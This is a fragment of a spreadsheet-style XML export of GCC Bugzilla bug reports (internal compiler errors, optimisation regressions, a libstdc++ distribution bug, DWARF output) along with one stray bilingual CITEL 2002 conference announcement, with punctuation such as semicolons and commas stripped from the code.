&gt; Aldy</t>
  </si>
  <si>
    <t>GCC-15590</t>
  </si>
  <si>
    <t>Illegal program not detected RM 10.1.1(14)</t>
  </si>
  <si>
    <t>--RM 10.1.1(14)
-- If a defining_program_unit_name of a given declaration or body
-- has a parent_unit_name then the given declaration or body shall
-- be a library_item.
package pak1 is
   generic
   procedure ada.text_io.put_line      --ERROR: not a library_item
end pak1
package body pak1 is
   procedure put_line is begin null end
end pak1
with pak1
procedure main is
   procedure p1 is new pak1.put_line
begin
   p1
end
$ gnatchop -w p gnatmake main
splitting p into:
   pak1.ads
   pak1.adb
   main.adb
gcc -c main.adb
gcc -c pak1.adb
gnatbind -x main.ali
gnatlink main.ali
Compilation finished at Wed Apr 14 18:58:34</t>
  </si>
  <si>
    <t>GCC-8215</t>
  </si>
  <si>
    <t xml:space="preserve"> Este mensaje se ha escrito en Ingles y en EspaÃ±ol
 This message has two versions . An English version and a Spansih version.
 Cursos precongreso en CITEL 2002 (VersiÃ³n en EspaÃ±ol)
 Entre las actividades acadÃ©micas que se desarrollarÃ¡n en el CITEL 2002 figuran los cursos precongreso. Estos cursos serÃ¡n impartidos el primer dÃ­a y tomando un mÃ¡ximo de 6 horas con un intermedio de 1 hora.  Las temÃ¡ticas escogidas son de actualidad y se rÃ¡n impartidas por relevantes profesores. A continuaciÃ³n le envÃ­o un adelanto del listado.  AdemÃ¡s de los 5 tÃ­tulos que se comunican en este mensaje se adicionaran otros haciendo un total mayor.
 Tendencias en la Seguridad de Redes y Sistemas (nuevo)
 Profesores: MSc. Walter Baluja GarcÃ­a* Ing. Miguel Angel Mendez Gil** Israel FernÃ¡ndez**
 *Departamento de TelemÃ¡tica. Cujae.Cuba *SegurmaticaCuba
 Redes de PrÃ³xima GeneraciÃ³n
 Profesor: Dr. RenÃ© YaÃ±ez de la Rivera
 Departamento de TelemÃ¡tica. Cujae.Cuba
 Plataforma .Net- Aplicaciones para MÃ³viles
 Profesores: Ing. Julio C. Jerez Camps Ing. Yordanys J. Pantoja Parra
 Departamento de TelemÃ¡tica. Cujae.Cuba
 TecnologÃ­a de videoconferencia
 Profesores: Ing. Zaid Cabrera Mange MsC. Jorge E. Preciado Velasco MsC. RaÃºl Rivera RodrÃ­guez Carlos Portes
 CICESE MÃ©xico
 TecnologÃ­as de transporte de IP en redes de cobertura amplia
 Profesores: Ing. Rodolfo CastaÃ±eda Segura MsC. RaÃºl Tamayo FernÃ¡ndez MsC. RaÃºl Rivera RodrÃ­guez
 CICESE MÃ©xico
 En el Sitio Oficial de CITEL 2002 http://www.ispjae.edu.cu/eventos/citel  encontrarÃ¡ mÃ¡s informaciÃ³n.
 Precongress courses in CITEL 2002 (English version) 
 Among the academic activities that will be developed during CITEL 2002 are the precongress courses.  These courses will be imparted the first day and they will last a maximum of 6 hours with a break of 1 hour.  The thematic chosen are of the present time  and will be imparted by relevant professors.  We send you an advance part of the list.  In addition to the 5 titles that appears in this message others will be added.  
 Tendencies in the Security of Networks and Systems (new)
 Professors: MSc. Walter Baluja GarcÃ­a* Ing. Miguel Angel Mendez Gil** Israel FernÃ¡ndez**
 * Department of Telematics. Cujae.Cuba *Segurmatica. Cuba
 Networks of Next Generation 
 Professor: Dr. RenÃ© YaÃ±ez de la Rivera
 Department of Telematics. Cujae.Cuba
 Dot Net Platform - Applications for Mobiles 
  Professors: Ing. Julio C. Jerez Camps Ing. Yordanys J. Pantoja Parra
 Department of Telematics. Cujae.Cuba
 Videoconference Technologies
 Professors: Ing. Zaid Cabrera Mange MsC. Jorge E. Preciado Velasco MsC. RaÃºl Rivera RodrÃ­guez Carlos Portes
 CICESE MÃ©xico
 IP transport technologies in wide cover networks
 Professors: Ing. Rodolfo CastaÃ±eda Segura MsC. RaÃºl Tamayo FernÃ¡ndez MsC. RaÃºl Rivera RodrÃ­guez
 CICESE MÃ©xico
 More information about CITEL 2002 http://www.ispjae.edu.cu/eventos/citel
 Marlon MuÃ±oz Miranda 
 Coordinador para Europa
 E-mail: europa@citel.ispjae.edu.cu
 URL: http://www.ispjae.cu/eventos/citel
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-45362</t>
  </si>
  <si>
    <t>[4.6 Regression] Dangling reference about saved cpp_macro for push/pop macro</t>
  </si>
  <si>
    <t>The issue is that for the push/pop macro the old state of the macro (a cpp_macro reference) is stored. As this structure is handled by GC without a root all get free'ed when garbage collection happens.
This gc can lead to issues when such a saved node gets undefined and the node which previously hold the cpp_macro reference gets reused for a different macro. As the linked in the saved macro list isn't under control of gc and it doesn't have a gc root element the stored reference gets invalid in such cases and can lead to segmentation faults due access to already free'ed memory.</t>
  </si>
  <si>
    <t>GCC-22084</t>
  </si>
  <si>
    <t>[4.1 Regression] Divide_1 test case hangs</t>
  </si>
  <si>
    <t>The Divide_1 test case now apparently hangs printing:
set_ld_library_path_env_vars:
ld_library_path=.:/home/tromey/gnu/Trunk/build/i686-pc-linux-gnu//libjava/.libs:/home/tromey/gnu/Trunk/build/gcc
0
-2147483648
50354022
GC Warning: Repeated allocation of very large block (appr. size 258048):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 258048):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 258048):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 258048):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 512000):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 258048):
        May lead to memory leak and poor performance.
GC Warning: Repeated allocation of very large block (appr. size 512000):
        May lead to memory leak and poor performance.</t>
  </si>
  <si>
    <t>GCC-48114</t>
  </si>
  <si>
    <t>[C++0x] binomial_distribution incorrect for p &gt; .5 and geometric_distribution wrongly implements the TR1 definition</t>
  </si>
  <si>
    <t>Created attachment 23651
Probability table for binomial_distribution.
The attached program samples binomial_distribution(10 .75) and
calculates the correct probabilities of each outcome. The output shows
that the probabilities are reversed. With p &gt; .5 the distribution should
be biased toward higher values.
        sample  correct
p_0     0.056   0.000
p_1     0.185   0.000
p_2     0.283   0.000
p_3     0.252   0.003
p_4     0.147   0.016
p_5     0.058   0.058
p_6     0.016   0.146
p_7     0.003   0.250
p_8     0.000   0.282
p_9     0.000   0.188
p_10    0.000   0.056
The problem is here __param.p() is a double.
--- include/c++/bits/random.tcc
+++ include/c++/bits/random.tcc
@@ -14347 +14347 @@
       {
        result_type __ret
        const _IntType __t = __param.t()
-       const _IntType __p = __param.p()
+       const double __p = __param.p()
        const double __p12 = __p &lt;= 0.5 ? __p : 1.0 - __p
        __detail::_Adaptor
          __aurng(__urng)</t>
  </si>
  <si>
    <t>GCC-48174</t>
  </si>
  <si>
    <t>DWARF for subroutine with no args indicates 'varargs'</t>
  </si>
  <si>
    <t>&gt; cat test.f
      MODULE swim_arrays
        REAL DIMENSION(::) ALLOCATABLE :: U
      END MODULE
      SUBROUTINE ALLOC_ARRAYS
        USE swim_arrays
        INTEGER N1N2
        PARAMETER (N1=513 N2=4097)
        INTEGER status
        ALLOCATE(U(N1N2) STAT=status)
      END SUBROUTINE
&gt; gfortran -g -O2 -c test.f
&gt; objdump --dwarf test.o
....
 : Abbrev Number: 2 (DW_TAG_subprogram)
       DW_AT_external    : 1    
       DW_AT_name        : (indirect string offset: 0x0): alloc_arrays    
       DW_AT_decl_file   : 1    
       DW_AT_decl_line   : 5    
       DW_AT_low_pc      : 0x0    
       DW_AT_high_pc     : 0x83    
       DW_AT_frame_base  : 0x0    (location list)
       DW_AT_sibling     :     
 : Abbrev Number: 3 (DW_TAG_unspecified_parameters)
.....
The DWARF information (DW_TAG_unspecified_parameters) for subroutine alloc_arrays above is showing that the subroutine has a variable number of arguments.  This is causing failures in performance tools that use this information.</t>
  </si>
  <si>
    <t>GCC-56854</t>
  </si>
  <si>
    <t>[4.9 Regression] error: non-decl/MEM_REF LHS in clobber statement</t>
  </si>
  <si>
    <t>I just tried to compile the package openlierox-0.59-0.10
on gcc-4.9 trunk dated 20130403 on an AMD x86_64 box.
The compiler said
/home/dcb/rpmbuild/BUILD/OpenLieroX/src/game/Settings.h: In constructor 'FeatureSettingsLayer::FeatureSettingsLayer(const string&amp;)':
/home/dcb/rpmbuild/BUILD/OpenLieroX/src/game/Settings.h:49:2: error: non-decl/MEM_REF LHS in clobber statement
  FeatureSettingsLayer(const std::string }
  ^
MEM[(struct ScriptVar_t *)this_1(D)].settings[_32]
# .MEM_113 = VDEF 
MEM[(struct ScriptVar_t *)this_1(D)].settings[_32] ={v} {CLOBBER}
/home/dcb/rpmbuild/BUILD/OpenLieroX/src/game/Settings.h:49:2: internal compiler error: verify_gimple failed
0xab89f9 verify_gimple_in_cfg(function*)
    ../../src/trunk/gcc/tree-cfg.c:4769
0x9efe17 execute_function_todo
    ../../src/trunk/gcc/passes.c:1963
0x9f0807 execute_todo
    ../../src/trunk/gcc/passes.c:1996
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-58721</t>
  </si>
  <si>
    <t>[4.9 Regression] The subroutine perdida is no longer inlined in fatigue.f90</t>
  </si>
  <si>
    <t>The subroutine perdida is no longer inlined in fatigue.f90. This occurred between revisions 201916 and 202776:
[macbook] lin/test% /opt/gcc/gcc4.9p-201916/bin/gfortran -Ofast -fwhole-program fatigue.f90
[macbook] lin/test% nm a.out | grep perdida
[macbook] lin/test% time a.out &gt; /dev/null
2.767u 0.003s 0:02.77 99.6%	0+0k 0+2io 0pf+0w
[macbook] lin/test% /opt/gcc/gcc4.9p-202776/bin/gfortran -Ofast -fwhole-program fatigue.f90
[macbook] lin/test% nm a.out | grep perdida
0000000100001380 t ___perdida_m_MOD_perdida.constprop.3
[macbook] lin/test% time a.out &gt; /dev/null
5.102u 0.004s 0:05.10 100.0%	0+0k 0+2io 0pf+0w
To understand why I could not bisect further see http://gcc.gnu.org/ml/gcc-regression/2013-09/ !-(</t>
  </si>
  <si>
    <t>GCC-54676</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: in set_value_range at tree-vrp.c:433</t>
  </si>
  <si>
    <t>Created attachment 28252
reduced testcase (from gcc.c-torture/compile/pr51247.c)
Compiler output:
$ gcc -O -fno-tree-ccp -fno-tree-copy-prop -fno-tree-fre -ftree-vrp testcase.c
testcase.c: In function 'foo':
testcase.c:11:1: internal compiler error: in set_value_range at tree-vrp.c:433
 foo (int x)
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Backtrace:
(gdb) bt
#0  0x0000000001120150 in fancy_abort(char const* int char const*) ()
#1  0x0000000000b8813f in set_value_range(value_range_d* value_range_type tree_node* tree_node* bitmap_head_def*) ()
    at /mnt/svn/gcc-trunk/gcc/tree-vrp.c:433
#2  0x0000000000b9a8f9 in vrp_visit_stmt(gimple_statement_d* edge_def** tree_node**) () at /mnt/svn/gcc-trunk/gcc/tree-vrp.c:7687
#3  0x0000000000afbb03 in simulate_stmt(gimple_statement_d*) () at /mnt/svn/gcc-trunk/gcc/tree-ssa-propagate.c:320
#4  0x0000000000afc166 in ssa_propagate(ssa_prop_result (*)(gimple_statement_d* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_d*))
    () at /mnt/svn/gcc-trunk/gcc/tree-ssa-propagate.c:443
#5  0x0000000000b96f30 in execute_vrp() () at /mnt/svn/gcc-trunk/gcc/tree-vrp.c:9124
#6  0x00000000008fdaed in execute_one_pass(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2199
#7  0x00000000008fdea5 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2254
#8  0x00000000008fdeb7 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2255
#9  0x00000000006c2228 in expand_function(cgraph_node*) () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1601
#10 0x00000000006c40d2 in compile() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1705
#11 0x00000000006c46c5 in finalize_compilation_unit() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2080
#12 0x00000000005a1ac0 in c_write_global_declarations() () at /mnt/svn/gcc-trunk/gcc/c/c-decl.c:10116
#13 0x00000000009e2c65 in compile_file() () at /mnt/svn/gcc-trunk/gcc/toplev.c:560
#14 0x00000000009e483a in toplev_main(int char**) () at /mnt/svn/gcc-trunk/gcc/toplev.c:1863
#15 0x00007ffff6e784bd in __libc_start_main () from /lib64/libc.so.6
#16 0x0000000000588781 in _start ()
Version:
$ gcc -v                                                                      
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-191648-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-191648-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.8.0 20120923 (experimental) (GCC) 
Tested revisions:
r191648 - crash
4.7 r191640 - OK</t>
  </si>
  <si>
    <t>GCC-8112</t>
  </si>
  <si>
    <t>gcc 3.2 sparc-sun-solaris2.8: -O2 != -O1</t>
  </si>
  <si>
    <t>gcc -v shows:
Reading specs from /sw/gen/sparc-sun-solaris2.8/gcc/3.2/lib/gcc-lib/sparc-sun-solaris2.8/3.2/specs
Configured with: /export/data01/build/cpkg/programs/gcc/3.2/work.korsakoff.wc.cray.com/gcc-3.2/configure --with-gnu-as --with-as=/sw/gen/sparc-sun-solaris2.8/binutils/2.12.1/bin/as --with-gnu-ld --with-ld=/sw/gen/sparc-sun-solaris2.8/binutils/2.12.1/bin/ld --enable-languages=c++f77objc --with-local-prefix=/sw/gen/sparc-sun-solaris2.8/gcc/3.2 --prefix=/sw/gen/sparc-sun-solaris2.8/gcc/3.2
Thread model: posix
gcc version 3.2
Compile the attached program using g++ -O1 execute
see the correct answer
result=1 expect=1
Compile the attached program using g++ -O2 execute
see the incorrect answer
result=0 expect=1
g++ -O3 also fails the same way as g++ -O2
The code uses a template to encapsulate operations on
unsigned long long.  Changing the liveness of some of the
automatics (for example to print the intermediate results)
will make the code do the right thing.
This problem is not repeatable on gcc3.2 on i686-pc-linux.
Release:
gcc 3.2
Environment:
sparc-sun-solaris2.8</t>
  </si>
  <si>
    <t>rrh</t>
  </si>
  <si>
    <t>GCC-44806</t>
  </si>
  <si>
    <t>4.5.0 i686 code generation regression with -O2</t>
  </si>
  <si>
    <t>This bug manifests on i686 and not on x86_64.
[FYI pared down from a proposed patch for coreutils' du.c. ]
The following code compiled with 4.5.0 and -O2 exits with status 1.
Compile with 4.4.4 and any optimization or 4.5.0 with -O1 and it exits with status 0.
$ cat k.c
#include 
#define N_DEV_BITS_4 5
#define N_INO_BITS_4 (32 - N_DEV_BITS_4 - 2 - 1)
#define N_DEV_BITS_8 8
#define N_INO_BITS_8 (64 - N_DEV_BITS_8 - 2 - 1)
struct dev_ino_4
{
  uint32_t mode:2
  uint32_t short_ino:N_INO_BITS_4
  uint32_t mapped_dev:N_DEV_BITS_4
  uint32_t always_set:1
}
struct dev_ino_8
{
  uint32_t mode:2
  uint64_t short_ino:N_INO_BITS_8
  uint32_t mapped_dev:N_DEV_BITS_8
  uint32_t always_set:1
}
struct dev_ino_full
{
  uint32_t mode:2
  uint32_t dev
  uint32_t ino
}
enum di_mode
{
  DI_MODE_4 = 1
  DI_MODE_8 = 2
  DI_MODE_FULL = 3
}
struct di_ent
{
  union
  {
    struct dev_ino_4 di4
    struct dev_ino_8 di8
    struct dev_ino_full full
    uint32_t u32
    uint64_t u64
    void *ptr
  } u
}
static struct di_ent
decode_ptr (struct di_ent const *v)
{
  struct di_ent di
  di.u.ptr = (void *) v
  return di
}
static int
di_ent_equal (void const *x void const *y)
{
  struct di_ent a = decode_ptr (x)
  struct di_ent b = decode_ptr (y)
  if (a.u.di4.mode != b.u.di4.mode)
    return 0
  if (a.u.di4.mode == DI_MODE_4)
    return (a.u.di4.short_ino == b.u.di4.short_ino
  if (a.u.di8.mode == DI_MODE_8)
    return (a.u.di8.short_ino == b.u.di8.short_ino
  return (a.u.full.ino == b.u.full.ino
}
int
main ()
{
  return di_ent_equal ((void *) 0x80143c4d (void *) 0x80173851)
}
$ /p/p/gcc-4.5.0/bin/gcc -Wall -O2 k.c &amp;&amp; ./a.out
[Exit 1]
$ /p/p/gcc-4.5.0/bin/gcc -Wall -O1 k.c  echo $?
0
$ gcc -v 2&gt;&amp;1|tail -1
gcc version 4.4.4 20100503 (Red Hat 4.4.4-2) (GCC) 
$ gcc -Wall -O2 k.c  echo $?
0
configured with: ../configure --disable-nls --enable-languages=c --prefix=/p/p/gcc-4.5.0</t>
  </si>
  <si>
    <t>GCC-14589</t>
  </si>
  <si>
    <t>[tree-ssa] Bootstrap failure on Tru64 UNIX</t>
  </si>
  <si>
    <t>Bootstrapping the current tree-ssa branch on Tru64 UNIX (both V4.0F and
V5.1B) fails:
/vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/config/alpha/crtfastmath.c:46: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [crtfastmath.o] Error 1
This happens even when running
$ cc1 crtfastmath.i
Program received signal SIGSEGV Segmentation fault.
0x00000001204ef634 in expand_call (exp=0x1f310 target=0x0 ignore=1) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/calls.c:2106
(gdb) where
#0  0x00000001204ef634 in expand_call (exp=0x1f310 target=0x0 ignore=1) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/calls.c:2106
#1  0x00000001202d5300 in expand_expr_real_1 (exp=0x1f310 target=0x0 tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/expr.c:7700
#2  0x00000001202c80a4 in expand_expr_real (exp=0x1f310 target=0x1a400 tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/expr.c:6423
#3  0x000000012011cd34 in c_objc_common_finish_file () at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/c-objc-common.c:253
#4  0x0000000120070310 in finish_file () at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/c-lang.c:196
#5  0x000000012010b858 in c_common_parse_file (set_yydebug=0) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/c-opts.c:1244
#6  0x0000000120145ac8 in compile_file () at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/toplev.c:1622
#7  0x0000000120148638 in do_compile () at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/toplev.c:2618
#8  0x0000000120148724 in toplev_main (argc=2 argv=0x11fffc018) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/toplev.c:2650
#9  0x00000001201436e8 in main (argc=2 argv=0x11fffc018) at /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/main.c:35
Here's crtfastmath.i:
# 1 /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/config/alpha/crtfastmath.c
# 1 /vol/gcc/obj/gcc-3.5-tree-ssa-20040312/5.1b-gcc/gcc//
# 1 
# 1 
# 1 /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/config/alpha/crtfastmath.c
# 37 /vol/gnu/src/gcc/gcc-tree-ssa-dist/gcc/config/alpha/crtfastmath.c
extern void __ieee_set_fp_control (unsigned long int)
static void __attribute__((constructor))
set_fast_math (void)
{
  __ieee_set_fp_control ((1UL&lt;&lt;12) | (1UL&lt;&lt;13))
}
Environment:
System: OSF1 rimsky V4.0 1229 alpha
Machine: alpha
host: alpha-dec-osf4.0f
build: alpha-dec-osf4.0f
target: alpha-dec-osf4.0f
configured with: /vol/gnu/src/gcc/gcc-tree-ssa-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --enable-languages=c++javaobjc --host alpha-dec-osf4.0f --build alpha-dec-osf4.0f --target alpha-dec-osf4.0f
How-To-Repeat:
Bootstrap tree-ssa branch as above.</t>
  </si>
  <si>
    <t>GCC-79655</t>
  </si>
  <si>
    <t>[6 Regression] ICE on invalid c++ code in cxx_eval_store_expression in cp/constexpr.c:3464</t>
  </si>
  <si>
    <t>Created attachment 40793
test-case
An invalid code adopted from clang:
$ g++ /home/marxin/BIG/Programming/llvm-project/clang/test/SemaCXX/constant-expression-cxx1y.cpp -std=c++14
...
/home/marxin/BIG/Programming/llvm-project/clang/test/SemaCXX/constant-expression-cxx1y.cpp:200:36: internal compiler error: in cxx_eval_store_expression at cp/constexpr.c:3464
   static_assert(do_stuff(-1 0) == 1 ) // expected-error {{constant expression}} expected-note {{in call}}
                                    ^
0xb156c4 cxx_eval_store_expression
	../../gcc/cp/constexpr.c:3464
0xb17e4b cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4049
0xb18b65 cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4341
0xb180b1 cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4088
0xb180b1 cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4088
0xb167f9 cxx_eval_statement_list
	../../gcc/cp/constexpr.c:3738
0xb1959b cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4432
0xb1961a cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:4438
0xb0d9c9 cxx_eval_call_expression
	../../gcc/cp/constexpr.c:1643
0xb17646 cxx_eval_constant_expression
	../../gcc/cp/constexpr.c:3971
0xb1a013 cxx_eval_outermost_constant_expr
	../../gcc/cp/constexpr.c:4613
0xb1abb7 maybe_constant_value(tree_node* tree_node*)
	../../gcc/cp/constexpr.c:4828
0xaf13c9 cp_fully_fold(tree_node*)
	../../gcc/cp/cp-gimplify.c:1963
0x9ffa99 cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
	../../gcc/cp/typeck.c:5243
0x823061 build_new_op_1
	../../gcc/cp/call.c:5982
0x823156 build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
	../../gcc/cp/call.c:6027
0x9fb075 build_x_binary_op(unsigned int tree_code tree_node* tree_code tree_node* tree_code tree_node** int)
	../../gcc/cp/typeck.c:3930
0x994d9c cp_parser_binary_expression
	../../gcc/cp/parser.c:9060
0x9951ee cp_parser_assignment_expression
	../../gcc/cp/parser.c:9190
0x995949 cp_parser_constant_expression
	../../gcc/cp/parser.c:9460
Started with r217663.</t>
  </si>
  <si>
    <t>GCC-38110</t>
  </si>
  <si>
    <t>gcc.dg/pr30286.c fails on i686-apple-darwin9</t>
  </si>
  <si>
    <t>The testcase from PR30286 is still failing on i686-apple-darwin9...
gcc-4 -O2 -ftrapv pr30286.c
./pr30286.exe
Abort
The abort occurs in the first test in pr30286.c...
    if (t.t[i] != ((i &gt; 6 &amp;&amp; i &lt;= 14) ? &amp;s : (struct S *) 0))
      abort ()</t>
  </si>
  <si>
    <t>GCC-71077</t>
  </si>
  <si>
    <t>[7 Regression] gcc -lto raises ICE</t>
  </si>
  <si>
    <t>gcc raises ICE as follows starting from rev. 235653 :
[#  00000001] {2186}$&gt;  ./gcc -O3 -flto  -march=core-avx2 O768_r.c
[ warnings snipped ]                                                               
O768_r.c:3:1: warning: return type defaults to 'int' [-Wimplicit-int]
 main() {
 ^~~~ 
O768_r.c: In function 'main':
O768_r.c:3:1: internal compiler error: in find_taken_edge_cond_expr at tree-cfg.c:2235
 main() {
 ^
0xa9fe03 find_taken_edge_cond_expr
        ../../..//src/235653/gcc/tree-cfg.c:2235
0xa9fe03 find_taken_edge(basic_block_def* tree_node*)
        ../../..//src/235653/gcc/tree-cfg.c:2182
0xc5880c thread_through_normal_block
        ../../..//src/235653/gcc/tree-ssa-threadedge.c:1077
0xc5a124 thread_across_edge(gcond* edge_def* bool const_and_copies* avail_exprs_stack* tree_node* (*)(gimple* gimple* avail_exprs_stack*))
        ../../..//src/235653/gcc/tree-ssa-threadedge.c:1274
0xce641f identify_jump_threads
        ../../..//src/235653/gcc/tree-vrp.c:10184
0xce641f vrp_finalize
        ../../..//src/235653/gcc/tree-vrp.c:10256
0xce641f execute_vrp
        ../../..//src/235653/gcc/tree-vrp.c:10345
0xce641f execute
        ../../..//src/235653/gcc/tree-vrp.c:10430
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: ./gcc returned 1 exit status
compilation terminated.
/usr/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
[#  00000001] {2187}$&gt;  cat  O768_r.c
*a
b c d
main() {
  for ( b++) {
    c = 0
    for ( c &lt; 32 c++)
      if (b &amp; 1 &lt;&lt; c)
        a[b + c] = d
  }
}</t>
  </si>
  <si>
    <t>saguryev.gnu</t>
  </si>
  <si>
    <t>GCC-62101</t>
  </si>
  <si>
    <t>deleted definitions of friend functions are rejected</t>
  </si>
  <si>
    <t>Test:
struct X
{
	friend void f(X int) = delete
	friend void f(X double) {}
}
struct Y
void g(Y int)
void g(Y double)
struct Y
{
	friend void g(Y int) = delete
	friend void g(Y double) {}
}
int main()
{
	X x
	f(x 5.0)
	Y y
	g(y 5.0)
}
deleted-friend.cpp:3:26: error: canâ€™t initialize friend function â€˜fâ€™
  friend void f(X int) = delete
                          ^
deleted-friend.cpp:13:26: error: canâ€™t initialize friend function â€˜gâ€™
  friend void g(Y int) = delete
                          ^
clang accepts the code. There doesn't seem to be any standard wording
forbidding in-class friend definitions that are deleted.</t>
  </si>
  <si>
    <t>GCC-58362</t>
  </si>
  <si>
    <t>Wrong column number for unused parameter</t>
  </si>
  <si>
    <t>void f (long s) { }
y.cc:1:6: warning: unused parameter 's' [-Wunused-parameter]
 void f (long s) { }
      ^
Note the column information which should point to s instead.
I tried the following:
--- function.c	(revision 202365)
+++ function.c	(working copy)
@@ -499721 +499722 @@ use_return_register (void)
 void
 do_warn_unused_parameter (tree fn)
 {
   tree decl
   for (decl = DECL_ARGUMENTS (fn)
        decl decl = DECL_CHAIN (decl))
     if (!TREE_USED (decl) &amp;&amp; TREE_CODE (decl) == PARM_DECL
 	&amp;&amp; DECL_NAME (decl) &amp;&amp; !DECL_ARTIFICIAL (decl)
 	&amp;&amp; !TREE_NO_WARNING (decl))
-      warning (OPT_Wunused_parameter unused parameter %q+D decl)
+      warning_at (DECL_SOURCE_LOCATION (decl) OPT_Wunused_parameter
+		  unused parameter %q+D decl)
 }
 /* Generate RTL for the end of the current function.  */
 void
 expand_function_end (void)
 {
   rtx clobber_after
   /* If arg_pointer_save_area was referenced only from a nested
And I checked in gdb the first argument of warning_at has the right column information but it is ignored :-(</t>
  </si>
  <si>
    <t>GCC-62298</t>
  </si>
  <si>
    <t>Internal Compiler Error in fold_convert_loc</t>
  </si>
  <si>
    <t>m_string.f90:737:0: internal compiler error: in fold_convert_loc at fold-const.c:2074
   res = this
 ^
0x53d898 ???
	../sysdeps/x86_64/elf/start.S:113
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The ICE also occurs in 4.10</t>
  </si>
  <si>
    <t>GCC-41206</t>
  </si>
  <si>
    <t>Segmentation fault from two #pragma GCC optimize lines</t>
  </si>
  <si>
    <t>gcc 4.4.0 has a segfault (t.c:5: internal compiler error: Segmentation fault) when compiling the following source file which has no includes or preprocessor directives:
----- t.c -----
#pragma GCC optimize (O0)
int main(void) {
    myfunc(0)
}
#pragma GCC optimize (O2)
----- t.c -----
Compile command line: gcc -c -O2 t.c
Output of gcc -v:
Using built-in specs.
Target: mingw32
Configured with: ../gcc-4.4.0/configure --enable-languages=cadac++fortranjavaobjcobj-c++ --disable-sjlj-exceptions --enable-shared --enable-libg
cj --enable-libgomp --with-dwarf2 --disable-win32-registry --enable-libstdcxx-debug --enable-version-specific-runtime-libs --prefix=/mingw --with-gmp=
/mingw/src/gmp/root --with-mpfr=/mingw/src/mpfr/root --build=mingw32
Thread model: win32
gcc version 4.4.0 (GCC)</t>
  </si>
  <si>
    <t>benhoyt+gccbugzilla</t>
  </si>
  <si>
    <t>GCC-2504</t>
  </si>
  <si>
    <t>Problems with the new checking code (boost)</t>
  </si>
  <si>
    <t>The following code a stripped down version of
lib/concept_check/concept_check_est.cpp from boost 1_21_1/ exposes a
problem which occurs with the new checking code. 
After the intermediate result
#ifndef BOOST_CONCEPT_CHECKS_HPP
#define BOOST_CONCEPT_CHECKS_HPP
#     include 
#endif
I reduced the code further to the following t.C source code. If I remove
the #ifndef BOOST_CONCEPT_CHECKS_HPP guards the code compiles without
a warning. If the guards are in place the strange compiler
message t.C:15: parse error before `::' token results. Furthermore I
note that boost::function_requires is not defined in the compilation unit.
That is because of t.C defines BOOST_CONCEPT_CHECKS_HPP and
therefore  is not included. But if the  
the unmodified file lib/concept_check/concept_check_est.cpp is
compiled exactly the same message occurs (parse error before::).  
Maybe the functions and macros defined in  and
boost/boost_concept_check.h are incompatible and the name of the
guard of the libstdc++ header file should be changed.
Release:
3.1 20010406 (experimental)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
glibc 2.2
GNU ld version 2.11.90.0.4 (with BFD 2.11.90.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
